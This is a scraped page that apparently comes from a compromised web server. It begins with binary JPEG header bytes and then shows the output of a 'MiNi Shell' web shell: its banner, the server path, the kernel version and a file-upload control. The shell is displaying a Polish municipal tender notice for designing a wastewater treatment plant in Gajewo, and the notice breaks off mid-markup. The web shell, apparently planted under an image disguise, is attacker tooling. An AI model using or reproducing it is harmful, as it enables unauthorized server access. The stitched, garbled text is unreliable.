JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220411/0011799501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Budowa<br/>oczyszczalni ścieków w Gajewie – dokumentacja techniczna” wraz z uzyskaniem<br/>pozwolenia na budowę oraz pełnieniem nadzoru autorskiego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CZARNKÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791069</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rybaki 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czarnków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@czarnkowgmina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.czarnkowgmina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Budowa<br/>oczyszczalni ścieków w Gajewie – dokumentacja techniczna” wraz z uzyskaniem<br/>pozwolenia na budowę oraz pełnieniem nadzoru autorskiego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e2d3791d-b998-11ec-9f44-6e63702cb2f7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00117995</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00022649/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Budowa oczyszczalni ścieków w Gajewie - dokumentacja techniczna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_czarnkow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gmina_czarnkow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/pn/gmina_czarnkow</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a) Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO,<br/>tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z<br/>RODO oraz zgodnie z przepisami krajowymi.<br/>Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego pn. &#34;Budowa oczyszczalni ścieków w Gajewie – dokumentacja techniczna”<br/>wraz z uzyskaniem pozwolenia na budowę oraz pełnieniem nadzoru autorskiego.<br/>b) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub<br/>podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie<br/>7<br/>z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o<br/>dostępie do informacji publicznej.<br/>c) Dane osobowe wykonawcy zawarte w protokole postępowania będą<br/>przechowywane przez okres 5 lat.<br/>d) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się w<br/>załączniku nr 6 do SWZ.<br/>e) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu<br/>innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował<br/>przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały<br/>zebrane (tj. cel określony w lit. b powyżej), przed takim dalszym przetwarzaniem<br/>poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej<br/>wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>f) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym<br/>postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych<br/>wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu<br/>o udzielenie zamówienia. Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO względem osób<br/>fizycznych, których dane osobowe dotyczą i od których dane te wykonawca<br/>bezpośrednio pozyskał i przekazał Zamawiającemu w treści oferty lub<br/>dokumentów składanych na żądanie Zamawiającego;<br/>- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych,<br/>których dane wykonawca pozyskał w sposób pośredni, a które to dane<br/>wykonawca przekazuje Zamawiającemu w treści oferty lub dokumentów<br/>składanych na żądanie Zamawiającego.<br/>g) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz<br/>ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały<br/>przekazane w związku z udziałem w postępowaniu, wykonawca składa<br/>oświadczenia o wypełnieniu przez niego obowiązków informacyjnych<br/>przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w<br/>załączniku nr 1 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">h) Zamawiający informuje, że:<br/>- Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO (dane<br/>osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu<br/>umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale<br/>IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>- Udostępnianie protokołu i załączników do protokołu ma zastosowanie do<br/>wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1<br/>RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne,<br/>poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do<br/>związków zawodowych oraz przetwarzania danych genetycznych, danych<br/>biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub<br/>danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby),<br/>zebranych w toku postępowania o udzielenie zamówienia.<br/>- W przypadku korzystania przez osobę, której dane osobowe są przetwarzane<br/>przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO<br/>(związanych z prawem wykonawcy do uzyskania od administratora<br/>potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem<br/>8<br/>wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o<br/>których mowa w art. 46 RODO, związanych z przekazaniem jego danych<br/>osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem<br/>otrzymania przez wykonawcę od administratora kopii danych osobowych<br/>podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z<br/>żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym<br/>mowa w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych), nie może naruszać integralności protokołu postępowania oraz jego<br/>załączników.<br/>- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>- W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art.<br/>18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych<br/>zawartych w protokole postępowania lub załącznikach do tego protokołu, od<br/>dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie<br/>udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18<br/>ust. 2 rozporządzenia 2016/679.<br/>Do spraw nieuregulowanych w SWZ mają zastosowanie przepisy ustawy<br/>z 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. poz. 2019 ze zm.).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowej dla<br/>zadania pn.: &#34;Budowa oczyszczalni ścieków w Gajewie – dokumentacja techniczna”<br/>wraz z uzyskaniem pozwolenia na budowę oraz pełnieniem nadzoru autorskiego.<br/>1) Oczyszczalnia w GAJEWIE winna być zaprojektowana w technologii SBR. Ilość osób<br/>przewidzianych do korzystania z oczyszczalni wynosi 3720 osób. Zużycie wody<br/>średnio wynosi 400 – 800 m3/d. Należy projektować oczyszczalnię o wydajności<br/>450m3/d<br/>2) Projekt winien zawierać następujące elementy :<br/>- budynek socjalno-techniczny z wydzielonymi pomieszczeniami : wizualizacja i<br/>sterowanie procesem technologicznym, stołówka, WC, łazienka, podręczny warsztat<br/>pomieszczenie gospodarcze, szatnia<br/>- budynek techniczny / pompownia ścieków surowych z sitem pionowym, sito<br/>piaskownik z płuczką piasku, zbiornik retencyjny, stacja dmuchaw, instalacja<br/>9<br/>odwodnienia osadu wiata ochronna/. Konstrukcja budynku stalowa z lekką obudową<br/>ścian osłonowych o<br/>grub.12cm z płyt warstwowych. Dach z płyt warstwowych grub.12 cm<br/>- składowisko odwodnionego osadu / płyta odkładcza bet. wiata w konstrukcji<br/>stalowej z dachem z blacho – dachówki z instalacją odprowadzającą odcieki<br/>- reaktor SBR – zbiorniki ze stali duplex reaktory biologiczne kompletne / pompy<br/>zatapialne, mieszadła, rurociągi z armaturą, układ napowietrzania, szafki sterownicze<br/>z układami sterowania, montaż pomostów i schodów zestali nierdzewnej reaktorów<br/>SBR, układ pomiarowy dla parametrów fizykochemicznych/<br/>- stacja zlewcza ścieków dowożonych z wyposażeniem / kontener izolowany<br/>wykonany ze stali 1.4301, sito automatyczne z praską i płuczką skratek, z<br/>rurociągami ze stali 1.4301, przepływomierzem, pomiarem PH i przewodności,<br/>rejestrem dostawców, sprężarką, zasuwą automatyczną im automatycznym<br/>płukaniem, rozdzielnicą zasilającą i sterowniczą, zestawem montażowym spustowym,<br/>zestawem montażowym sita i rozdzielczym ze stali duplex /<br/>- przepompownia ścieków surowych z kręgów betonowych wibroprasowanych o<br/>średnicy 3,0m / montaż pompowni ścieków wraz z pompami zatapialnymi wirowymi,<br/>sitem pionowym, układem pomiarowym poziomu ścieków, pomostem wraz z<br/>drabinkami wewnątrz przepompowni, montaż pomostów i drabinek wewnątrz<br/>przepompowni, szafka elektryczno-sterownicza mocowana do gotowego podłoża,<br/>żuraw wyciągowy do 1,0t. /<br/>- sitopiaskownik / zintegrowana praska i płuczka skratek i piasku, zestaw<br/>instalcyjny z rurociągami stal 1.4401, zestaw usuwania odpadów ze stali 1.4401,<br/>krata ręczna wraz z rurociągami ze stali 1.4401, szafa zasilająco-sterownicza,<br/>przepływomierz elektromagnetyczny, zasuwy nożowe, kontener na odpady ruchomy<br/>- zbiornik retencyjny ścieków z pompami pionowymi i mieszadłami zblokowanymi<br/>z napędem, z szafkami sterowniczymi mocowanymi do podłoża, rusztem<br/>napowietrzającym, układem pomiarowym poziomu ścieków, przepływomierzem,<br/>orurowaniem i armaturą zbiornika, z żurawiem wyciągowym<br/>- studnia pomiarowa osadu nadmiernego / przepływomierz elektromagnetyczny,<br/>rurociągi, kształtki armatura DN 80 stal 1.4401, drabina, szafka sterownicza, drabina<br/>- stacja dmuchaw / układ dystrybucji powietrza stal 1.4401, przepustnice między<br/>kołnierzowe, dmuchawy napowietrzające z falownikiem 0,75 i 0,65 bara P 11 kW,<br/>rozdzielnica zasilająca i sterowania awaryjnego /<br/>- zbiornik zagęszczacza osadu / układ kierunkujący strugę stal 1.4401, sonda<br/>pomiaru gęstości osadu, szafka układów pomiarowych, pompa osadu zagęszczonego,<br/>rozdzielnica zasilająca i sterowania awaryjnego do pompy, żuraw ręczny do<br/>10<br/>wyciągania pomp stal 1.4301, dekander z regulowanym przelewem stal 1.4401,<br/>kominek wentylacyjny stal 1.4301, drabina stal 1.4401, pokrywa włazowa stal<br/>1.4401/<br/>- zbiornik stabilizacji osadu / mieszadła zatapialne zblokowane z napędem, zestaw<br/>dyfuzorów, pompy zatapialne wirowe zblokowane z napędem, rurociągi z armaturą<br/>wew. zbiornika, ruszt napowietrzający, dekander z regulowanym przelewem, układ<br/>pomiarowy poziomu, lustra osadu, stężenia tlenu i parametrów fizykochemicznych,<br/>szafka elektryczno-sterownicza, żuraw wyciągowy. Wykonanie elementów stalowych<br/>stal 1.4401<br/>- instalacja odwodnienia osadu /pompa wyporowa osadu z falownikiem, prasa<br/>śrubowa z flokulatorem, stacja przygotowania polimeru z emulsji, pompa wyporowa<br/>dawkowania polielektrolitu z falownikiem, system dozowania wapna, przenośnik<br/>spiralny do transportu osadu, rozdzielnica zasilająca i sterowania instalacji, zbiornik<br/>pośredni osadu , orurowanie i armatura, kontener na odpady ruchomy. Wykonanie<br/>elementów stalowych stal 1.4401<br/>- biofiltr / biofiltr dezodoryzacja odorów z węglem aktywnym i dmuchawą,<br/>orurowanie z armaturą połączeniową. Wykonanie elementów stalowych stal 1.4401/<br/>- studnia pomiarowa obejściowa / przepływomierz elektromagnetyczny, rurociągi,<br/>kształtki i armatura stal 1.4401, konstrukcja wsporcza, zawiesia, drabina stal 1.4401,<br/>szafka zasilająca<br/>- stacja dozowania PIX FERROX / szafka elektryczno-sterownicza i pompowo<br/>zaworowa, rurociągi i armatura wew.instalacji, zbiornik PIX z płaszczem ochronnym,<br/>zbiornik Ferox z płaszczem ochronnym – poj. Po 4,0m3, zestaw zaworowo-pompowy<br/>do dozowania reagentów chemicznych kpl. 2,0<br/>- studnia przepływomierza /przepływomierz elektromagnetyczny, zasuwy,<br/>rurociągi i armatura, konstrukcja wsporcza, zawiesia, drabina, szafka zasilająca.<br/>Wykonanie elementów stalowych stal 1.4401<br/>- rurociągi technologiczne zewnętrzne / wodociągowe z rur PE zgrzewanych<br/>doczołowo PE , PEHD d-90mm, sprężone powietrze stalowe DN 100 i DN 200<br/>AISI316, kanalizacja PVC 160/200mm łączone na wcisk, kanały PVC 315/250mm<br/>- studzienki kanalizacyjne systemowe d-600mm – zamknięcie rurą teleskopową,<br/>studnie rewizyjne z kręgów żelbet. d-1200mm<br/>- wentylacje – węzeł oczyszczania mechanicznego – wentylatory promieniowe<br/>o średnicy 315mm i 400mm, przewody wentylacyjne z blachy stal. śr. 315/400mm<br/>11<br/>- nawierzchnie drogowe / nawierzchnia z kostki brukowej na podsypce cementopiaskowej<br/>na podbudowie z kruszywa łamanego warstwa dolna 15cm i górna 8cm po<br/>zagęszczeniu obu., krawężniki bet. 15x30cm na podsypce cementowo-piaskowej /<br/>- nawierzchnie chodników, opasek przy budynkach i obiektów /nawierzchnie z<br/>kostki brukowej grub. 8,0cm na podsypce cementowo-piaskowej, obrzeża bet.<br/>30x8cm spoinowanie zaprawą cementową<br/>- wykonanie trawników /wykonanie trawników parkowych siewem grunt. Kat. I-III<br/>z nawożeniem/<br/>- wykonanie przyłącza do sieci energetycznej zasilającej oczyszczalnię<br/>- zastosowanie odnawialnych źródeł energii – np.: fotowoltaika, solary<br/>zapewniających zasilanie technologii oczyszczalni, oświetlenie zewnętrzne<br/>i wewnętrzne budynków, ogrzewanie.<br/>- Wizualizacja wraz monitoringiem pracy oczyszczalni z przekazem do Zakładu<br/>Usług Wodnych Sp. z o.o. w Brzeźnie ul. Krótka 1 z synchronizacją z istniejącym w<br/>zakładzie monitoringiem na bazie programu Hydro Partnera z Leszna.<br/>- zapewnienie zasilania awaryjnego poprzez agregat prądotwórczy o mocy<br/>wyliczonej w zależności od potrzeb (lokalizacja, przyłącze)<br/>W zakres zadania wchodzi<br/>1) opracowanie map sytuacyjno-wysokościowych do celów projektowych<br/>2) sporządzenie projektu budowlano-wykonawczego zgodnie z obowiązującymi<br/>przepisami w branży architektonicznej, konstrukcyjno-budowlanej, sanitarnej,<br/>elektrycznej, drogowej ze szczególnym uwzględnieniem Ustawy z dnia 7 lipca<br/>1994 roku Prawo budowlane (t.j. Dz. U. z 2021 r. poz. 2351 z późn. zm.),<br/>Rozporządzenie Ministra Rozwoju z 11 września 2020 r. w sprawie<br/>szczegółowego zakresu i formy projektu budowlanego (Dz. U. poz. 1609 z późn.<br/>zm.) oraz Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 roku w<br/>sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji<br/>technicznych wykonania i odbioru robót budowlanych oraz programu<br/>funkcjonalno – użytkowego (Dz. U. poz. 2454)<br/>3) uzyskanie wszelkich wymaganych badań, opinii, uzgodnień, decyzji i pozwoleń z<br/>pozwoleniem wodnoprawnym włącznie;<br/>4) sporządzenie przedmiaru i kosztorysu w wersji papierowej oraz w formie<br/>elektronicznej. Wykonawca zobowiązany jest do szczegółowego ustalenia zakresu<br/>przedmiotowego wykonania kosztorysów (uwzględniających etapy późniejszej<br/>realizacji w ramach robót budowlanych zleconych przez Zamawiającego);<br/>12<br/>5) sporządzenie specyfikacji technicznych wykonania i odbioru robót budowlanych;<br/>6) uzyskanie w imieniu Zamawiającego pozwolenia na budowę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71354000-4 - Usługi sporządzania map</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">230 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 